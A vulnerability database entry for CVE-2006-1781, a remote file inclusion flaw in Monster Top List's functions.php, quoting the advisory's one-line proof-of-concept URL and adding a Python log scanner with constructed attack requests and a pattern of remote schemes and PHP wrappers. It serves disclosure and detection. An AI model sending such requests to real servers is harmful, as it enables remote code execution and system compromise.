Monster Top List functions.php Remote File Inclusion Vulnerability

Vulnerability ID 1110081 Vulnerability type Code injection
Published 2006-04-17 Updated 2006-04-18
CVE number CVE-2006-1781 CNNVD-ID CNNVD-200604-207
Platform PHP CVSS score 7.5
|Vulnerability sources
https://www.exploit-db.com/exploits/27660
https://www.securityfocus.com/bid/17546
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200604-207
|Vulnerability details
The functions.php page in CircleR Monster Top List (MTL) 1.4 contains a PHP remote file inclusion vulnerability, which lets remote attackers execute arbitrary PHP code via a URL supplied in the root_path parameter. Note: it was later reported that versions 1.4.2 and earlier are affected by this issue.
|Vulnerability EXP
source: http://www.securityfocus.com/bid/17546/info

Monster Top List is prone to a remote file-include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker can exploit this issue to include an arbitrary remote file containing malicious PHP code and execute it in the context of the webserver process. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible.

http://www.example.com/[path]/sources/functions.php?root_path=http://www.example.com/
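For defenders, an added example (not from the advisory or the Monster Top List project) that scans web-server access logs for requests matching the proof-of-concept shape above: a hit on sources/functions.php whose root_path value carries a remote URL scheme or a PHP stream wrapper. The log lines, addresses and path prefix are constructed for the example.

```python
"""Flag remote-file-include attempts against sources/functions.php.

Added example; the log lines below are constructed, not real traffic.
The vulnerable inclusion happens server-side, so a remote scheme in the
root_path parameter is the observable the log actually records.
"""
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Apache/nginx "combined" log format: client, timestamp, request line, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})')

# Schemes/wrappers that would make include() fetch or decode off-disk content.
REMOTE_RE = re.compile(r'^(?:https?|ftps?|php|data|expect|phar)://|^data:', re.I)

VULN_PATH = "/sources/functions.php"   # page named in the advisory
PARAM = "root_path"                    # parameter named in the advisory

def is_rfi_attempt(target: str) -> bool:
    """True when the request hits functions.php with an off-host root_path."""
    parts = urlsplit(target)
    if not parts.path.lower().endswith(VULN_PATH):
        return False
    for value in parse_qs(parts.query, keep_blank_values=True).get(PARAM, []):
        # parse_qs already decoded once; decode again so a double-encoded
        # scheme (%253A%252F%252F) is still recognised.
        if REMOTE_RE.search(unquote(value).lstrip()):
            return True
    return False

def scan_log(lines):
    """Return (client ip, timestamp, request target) for each RFI attempt."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and is_rfi_attempt(m["target"]):
            hits.append((m["ip"], m["ts"], m["target"]))
    return hits

# Constructed sample: plain PoC shape, a local-path probe (not flagged here),
# a percent-encoded scheme, a double-encoded scheme, and benign traffic.
SAMPLE_LOG = [
    '203.0.113.7 - - [17/Apr/2006:10:02:11 +0000] "GET /mtl/sources/functions.php?root_path=http://203.0.113.7/ HTTP/1.1" 200 512',
    '198.51.100.4 - - [17/Apr/2006:10:03:40 +0000] "GET /mtl/sources/functions.php?root_path=../config HTTP/1.1" 200 512',
    '192.0.2.9 - - [17/Apr/2006:10:04:02 +0000] "GET /mtl/sources/functions.php?root_path=%68ttp%3A%2F%2F192.0.2.9%2Fx HTTP/1.1" 200 512',
    '192.0.2.9 - - [17/Apr/2006:10:04:05 +0000] "GET /mtl/sources/functions.php?root_path=http%253A%252F%252F192.0.2.9%252F HTTP/1.1" 200 512',
    '192.0.2.10 - - [17/Apr/2006:10:05:00 +0000] "GET /mtl/index.php HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for ip, ts, target in scan_log(SAMPLE_LOG):
        print(f"{ts} {ip} RFI attempt: {target}")
```

The local-path probe is deliberately not matched; a separate directory-traversal rule should cover that case, since this one is scoped to the remote-inclusion behaviour the advisory describes.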
|Affected products
Monster Top List Monster Top List 1.4
|References

Source: XF
Name: monstertoplist-functions-file-include(25774)
Link: http://xforce.iss.net/xforce/xfdb/25774
Source: BID
Name: 23074
Link: http://www.securityfocus.com/bid/23074
Source: BID
Name: 17546
Link: http://www.securityfocus.com/bid/17546
Source: OSVDB
Name: 24650
Link: http://www.osvdb.org/24650
Source: MILW0RM
Name: 3530
Link: http://www.milw0rm.com/exploits/3530
Source: VUPEN
Name: ADV-2006-1350
Link: http://www.frsirt.com/english/advisories/2006/1350
Source: SECUNIA
Name: 19688
Link: http://secunia.com/advisories/19688
Source: MISC
Link: http://pridels0.blogspot.com/2006/04/monstertoplist.html